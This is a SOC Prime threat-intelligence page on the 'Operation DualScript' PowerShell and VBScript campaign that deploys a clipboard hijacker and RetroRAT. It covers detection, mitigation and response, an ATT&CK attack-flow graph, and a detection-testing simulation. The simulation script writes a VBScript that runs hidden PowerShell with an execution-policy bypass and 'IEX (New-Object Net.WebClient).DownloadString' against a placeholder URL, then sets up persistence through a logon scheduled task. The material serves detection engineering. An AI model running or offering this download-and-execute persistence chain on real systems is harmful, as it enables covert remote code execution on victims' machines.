SOC Prime Bias: Critical

31 Mar 2026 15:28
newspaper icon Seqrite

Operation DualScript: Multi-Stage PowerShell Malware Targeting Crypto and Finance

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Operation DualScript: Multi-Stage PowerShell Malware Targeting Crypto and Finance
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

The report outlines Operation DualScript, a multi-stage malware campaign that relies on scheduled-task persistence, VBScript launchers, and PowerShell loaders to deploy both a clipboard hijacker and the RetroRAT remote access trojan. The attackers store malicious PowerShell on external servers and run it fully in memory to reduce detection opportunities. RetroRAT records keystrokes, monitors active windows for finance-related keywords, and sends stolen data through a custom TCP C2 channel. The campaign is aimed at cryptocurrency activity and U.S. banking targets.

Investigation

Analysts discovered scheduled tasks configured to launch VBScript files from user-writable paths, which then executed hidden PowerShell with execution-policy bypass enabled. Two parallel delivery chains were identified: one retrieved a Wallet.txt script to hijack cryptocurrency clipboard contents, while the other loaded RetroRAT directly into memory. Static analysis also exposed anti-analysis logic, mutex creation, multi-threaded keylogging, and a hard-coded C2 handshake string.

Mitigation

Defenders should monitor for suspicious scheduled tasks that invoke VBScript or PowerShell with hidden windows and bypass arguments. Endpoint detection should focus on in-memory PowerShell execution, unusual clipboard monitoring behavior, and creation of unknown mutexes. Organizations should also block outbound traffic to the malicious domains and apply strict execution controls to PowerShell and VBScript.

Response

If this activity is detected, isolate the affected host, disable the malicious scheduled tasks, and remove any persisted VBScript or PowerShell artifacts. Perform a full forensic sweep for the RetroRAT payload, captured keystroke data, and related C2 traffic. Reset exposed cryptocurrency wallet information and change banking credentials. Restore affected systems from clean backups and block the identified domains and IP addresses at the network layer.

"graph TB %% Class definitions classDef technique fill:#d1e8ff classDef file fill:#ffe6cc classDef malware fill:#ffcccc classDef process fill:#e2ffd6 %% Nodes u2013 Techniques tech_persistence["<b>Technique</b> – <b>T1053 Scheduled Task/Job</b><br/><b>Description</b>: Creates a Windows scheduled task that runs a VBScript launcher in hidden mode for persistence."] class tech_persistence technique tech_execution["<b>Technique</b> – <b>T1059.001 PowerShell</b><br/><b>Description</b>: Executes PowerShell code via executionu2011policy bypass and runs it directly in memory."] class tech_execution technique tech_defense["<b>Technique</b> – <b>T1497.002 Virtualization Sandbox Evasion</b><br/><b>Description</b>: Checks for sandbox usernames and VM artifacts; aborts if such environment is detected."] class tech_defense technique tech_download["<b>Technique</b> – <b>T1102 Web Service</b><br/><b>Description</b>: Retrieves a remote payload (Wallet.txt) over HTTPS and converts it to a ScriptBlock for inu2011memory execution."] class tech_download technique tech_clipboard["<b>Technique</b> – <b>T1115 Clipboard Data</b> and <b>T1204.004 Malicious Copy and Paste</b><br/><b>Description</b>: Monitors the system clipboard and replaces legitimate cryptocurrency addresses with attackeru2011controlled wallets."] class tech_clipboard technique tech_keylog["<b>Technique</b> – <b>T1056.001 Keylogging</b><br/><b>Description</b>: Installs a lowu2011level keyboard hook to capture keystrokes during financial sessions."] class tech_keylog technique tech_screen["<b>Technique</b> – <b>T1113 Screen Capture</b><br/><b>Description</b>: Records screenshots or streams the desktop for visual monitoring of victim activity."] class tech_screen technique tech_c2["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/><b>Description</b>: Sends harvested keystrokes, clipboard data and logs to a hardu2011coded C2 server using a TCP client."] class tech_c2 technique tech_process["<b>Technique</b> – <b>T1543 Create or Modify System Process</b><br/><b>Description</b>: Scheduled task spawns a new process for the PowerShell payload and later creates additional threads for parallel functions."] class tech_process technique tech_rdp["<b>Technique</b> – <b>T1219.002 Remote Desktop Software</b><br/><b>Description</b>: Enables attacker to view or control the victim desktop through the RetroRAT component."] class tech_rdp technique tech_inputinj["<b>Technique</b> – <b>T1674 Input Injection</b><br/><b>Description</b>: Injects attackeru2011controlled wallet strings into the clipboard before the victim pastes the content."] class tech_inputinj technique %% Nodes u2013 Artifacts file_vbscript["<b>File</b> – <b>Name</b>: ppamproServiceZuneWAL.vbs / PiceVid.vbs<br/><b>Purpose</b>: Launches the PowerShell payload in hidden mode."] class file_vbscript file malware_retro["<b>Malware</b> – <b>Name</b>: RetroRAT<br/><b>Function</b>: Provides remote desktop and command execution capabilities."] class malware_retro malware %% Connections u2013 Flow tech_persistence –>|creates| file_vbscript file_vbscript –>|launches| tech_execution tech_execution –>|uses| tech_download tech_download –>|delivers payload to| tech_process tech_process –>|spawns| tech_keylog tech_process –>|spawns| tech_screen tech_process –>|spawns| tech_clipboard tech_clipboard –>|enables| tech_inputinj tech_keylog –>|exfiltrates via| tech_c2 tech_screen –>|exfiltrates via| tech_c2 tech_clipboard –>|exfiltrates via| tech_c2 tech_process –>|starts| tech_rdp tech_rdp –>|communicates with| tech_c2 tech_rdp –>|runs| malware_retro tech_defense –>|checks before| file_vbscript "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The attacker first stages a VBScript (dual.vbs) in the user’s profile directory. The script’s purpose is to launch PowerShell with the flags -WindowStyle Hidden and -ExecutionPolicy Bypass, then download and execute a remote payload (simulated with a simple Write-Host). To achieve persistence, the attacker registers a scheduled task (DualScriptPersist) that runs the VBScript at logon. Each step produces the two correlated EventID 4104 entries the rule looks for.

  • Regression Test Script:

    # -------------------------------------------------
# DualScript Attack Simulation – PowerShell
# -------------------------------------------------
# 1️⃣ Create malicious VBScript in a user‑writable path
$vbsPath = "$env:USERPROFILEdual.vbs"
$payloadUrl = "http://example.com/payload.ps1"   # placeholder URL
$vbsContent = @"
WScript.Sleep 500
Dim sh
Set sh = CreateObject("WScript.Shell")
sh.Run "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command `"IEX (New-Object Net.WebClient).DownloadString('$payloadUrl')`""
"@
$vbsContent | Set-Content -Path $vbsPath -Encoding ASCII

# 2️⃣ Register a scheduled task that runs the VBScript at every user logon
$taskName = "DualScriptPersist"
$taskAction = "`"$vbsPath`""
schtasks.exe /Create `
    /SC ONLOGON `
    /RL HIGHEST `
    /TN $taskName `
    /TR $taskAction `
    /F

# 3️⃣ Force the task to run immediately (trigger detection)
schtasks.exe /Run /TN $taskName

Write-Host "`n[+] DualScript simulation executed. Check your SIEM for alerts."
# -------------------------------------------------

  • Cleanup Commands:

    # -------------------------------------------------
# DualScript Simulation Cleanup
# -------------------------------------------------
$taskName = "DualScriptPersist"
$vbsPath  = "$env:USERPROFILEdual.vbs"

# Delete scheduled task
schtasks.exe /Delete /TN $taskName /F

# Remove the VBScript file
Remove-Item -Path $vbsPath -Force -ErrorAction SilentlyContinue

Write-Host "`n[+] Cleanup completed."
# -------------------------------------------------

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free